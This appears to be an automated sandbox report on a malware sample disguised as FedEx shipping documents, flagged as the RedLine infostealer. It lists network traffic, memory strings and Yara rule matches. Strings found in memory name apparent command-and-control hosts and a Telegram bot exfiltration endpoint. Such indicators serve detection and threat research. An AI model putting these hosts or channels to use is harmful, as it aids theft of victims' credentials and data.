Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 18 Feb 2025 07:12:16 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 18 Feb 2025 07:12:33 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 18 Feb 2025 07:12:39 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: hzwdvhxM.pif, 00000007.00000002.3928012467.00000000297DE000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3928176067.0000000025D2E000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3931012039.000000002A9A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: hzwdvhxM.pif, 00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000003.1467552479.000000002792F000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3927113421.00000000293E0000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000003.1592650424.0000000023E4C000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3927698614.0000000025990000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3932320588.00000000287D0000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3930139292.000000002A5C0000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3936711785.000000002D540000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000003.1679054721.0000000028ABC000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: hzwdvhxM.pif, 00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000003.1467552479.000000002792F000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3928012467.0000000029711000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3927113421.00000000293E0000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000003.1592650424.0000000023E4C000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3927698614.0000000025990000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3932320588.00000000287D0000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3928176067.0000000025C81000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3930139292.000000002A5C0000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3936711785.000000002D540000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000003.1679054721.0000000028ABC000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3931012039.000000002A8C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: hzwdvhxM.pif, 00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000003.1467552479.000000002792F000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3928012467.0000000029711000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3927113421.00000000293E0000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000003.1592650424.0000000023E4C000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3927698614.0000000025990000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3932320588.00000000287D0000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3928176067.0000000025C81000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3930139292.000000002A5C0000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3936711785.000000002D540000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000003.1679054721.0000000028ABC000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3931012039.000000002A8C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: hzwdvhxM.pif, 00000007.00000002.3928012467.0000000029711000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3928176067.0000000025C81000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3931012039.000000002A8C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: hzwdvhxM.pif, 00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000003.1467552479.000000002792F000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3927113421.00000000293E0000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000003.1592650424.0000000023E4C000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3927698614.0000000025990000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3932320588.00000000287D0000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3930139292.000000002A5C0000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3936711785.000000002D540000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000003.1679054721.0000000028ABC000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: hzwdvhxM.pif, 00000007.00000002.3928012467.0000000029711000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3928176067.0000000025C81000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3931012039.000000002A8C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: hzwdvhxM.pif, 00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000003.1467552479.000000002792F000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3928012467.0000000029711000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3927113421.00000000293E0000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000003.1592650424.0000000023E4C000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3927698614.0000000025990000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3932320588.00000000287D0000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3928176067.0000000025C81000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3930139292.000000002A5C0000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3936711785.000000002D540000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000003.1679054721.0000000028ABC000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3931012039.000000002A8C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, Mxhvdwzh.PIF.0.dr	String found in binary or memory: http://www.denisdraw.fr
Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, Mxhvdwzh.PIF.0.dr	String found in binary or memory: http://www.denisdraw.frArdoise
Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000002.1500660280.0000000021570000.00000004.00000020.00020000.00000000.sdmp, FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000002.1498803123.0000000020C3D000.00000004.00001000.00020000.00000000.sdmp, FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000003.1435849334.000000007EE56000.00000004.00001000.00020000.00000000.sdmp, FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000003.1435508711.000000007EE1F000.00000004.00001000.00020000.00000000.sdmp, FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000002.1459096681.0000000000786000.00000004.00000020.00020000.00000000.sdmp, FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000002.1501884350.0000000021889000.00000004.00001000.00020000.00000000.sdmp, FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000003.1435849334.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3896174260.0000000000436000.00000040.00000400.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000000.1451431606.0000000000416000.00000002.00000001.01000000.00000005.sdmp, Mxhvdwzh.PIF, 0000000B.00000002.1593207176.00000000025DF000.00000004.00001000.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000000.1588796045.0000000000416000.00000002.00000001.01000000.00000005.sdmp, Mxhvdwzh.PIF, 0000000D.00000002.1678940932.0000000002959000.00000004.00001000.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000000.1673804805.0000000000416000.00000002.00000001.01000000.00000005.sdmp, hzwdvhxM.pif.0.dr	String found in binary or memory: http://www.pmail.com
Source: hzwdvhxM.pif, 00000007.00000003.3266544740.000000002A9DD000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3930482210.000000002A793000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000003.3694016126.0000000026F4C000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3930369501.0000000026D03000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BB8C000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3934166321.000000002B943000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: hzwdvhxM.pif, 00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000003.1467552479.000000002792F000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3928012467.00000000297DE000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3927113421.00000000293E0000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000003.1592650424.0000000023E4C000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3927698614.0000000025990000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3932320588.00000000287D0000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3928176067.0000000025C81000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3930139292.000000002A5C0000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3936711785.000000002D540000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000003.1679054721.0000000028ABC000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3931012039.000000002A98C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: hzwdvhxM.pif, 00000007.00000003.3266544740.000000002A9DD000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3930482210.000000002A793000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000003.3694016126.0000000026F4C000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3930369501.0000000026D03000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BB8C000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3934166321.000000002B943000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: hzwdvhxM.pif, 00000007.00000003.3266544740.000000002A9DD000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3930482210.000000002A793000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000003.3694016126.0000000026F4C000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3930369501.0000000026D03000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BB8C000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3934166321.000000002B943000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: hzwdvhxM.pif, 00000007.00000003.3266544740.000000002A9DD000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3930482210.000000002A793000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000003.3694016126.0000000026F4C000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3930369501.0000000026D03000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BB8C000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3934166321.000000002B943000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: hzwdvhxM.pif, 00000007.00000002.3928012467.00000000297DE000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3928176067.0000000025D2E000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3931012039.000000002A9A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: hzwdvhxM.pif, 00000007.00000003.3266544740.000000002A9DD000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3930482210.000000002A793000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000003.3694016126.0000000026F4C000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3930369501.0000000026D03000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BB8C000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3934166321.000000002B943000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: hzwdvhxM.pif, 00000007.00000003.3266544740.000000002A9DD000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3930482210.000000002A793000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000003.3694016126.0000000026F4C000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3930369501.0000000026D03000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BB8C000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3934166321.000000002B943000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: hzwdvhxM.pif, 00000007.00000003.3266544740.000000002A9DD000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3930482210.000000002A793000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000003.3694016126.0000000026F4C000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3930369501.0000000026D03000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BB8C000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3934166321.000000002B943000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: hzwdvhxM.pif, 00000007.00000002.3928012467.000000002975E000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000003.1467552479.000000002792F000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3927113421.00000000293E0000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000003.1592650424.0000000023E4C000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3927698614.0000000025990000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3932320588.00000000287D0000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3928176067.0000000025C81000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3931012039.000000002A90E000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3930139292.000000002A5C0000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3936711785.000000002D540000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000003.1679054721.0000000028ABC000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: hzwdvhxM.pif, 00000007.00000003.3266544740.000000002A9DD000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3930482210.000000002A793000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000003.3694016126.0000000026F4C000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3930369501.0000000026D03000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BB8C000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3934166321.000000002B943000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: hzwdvhxM.pif, 00000007.00000003.3266544740.000000002A9DD000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3930482210.000000002A793000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000003.3694016126.0000000026F4C000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3930369501.0000000026D03000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BB8C000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3934166321.000000002B943000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: hzwdvhxM.pif, 00000007.00000002.3928012467.00000000297DE000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3928176067.0000000025D2E000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3931012039.000000002A9A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49762 version: TLS 1.2

Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Window created: window name: CLIPBRDWNDCLASS

System Summary

Malicious sample detected (through community Yara rule)

Source: 12.2.hzwdvhxM.pif.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.hzwdvhxM.pif.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe.2189b7a8.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.hzwdvhxM.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.hzwdvhxM.pif.438038.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.1.hzwdvhxM.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 14.2.hzwdvhxM.pif.438038.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
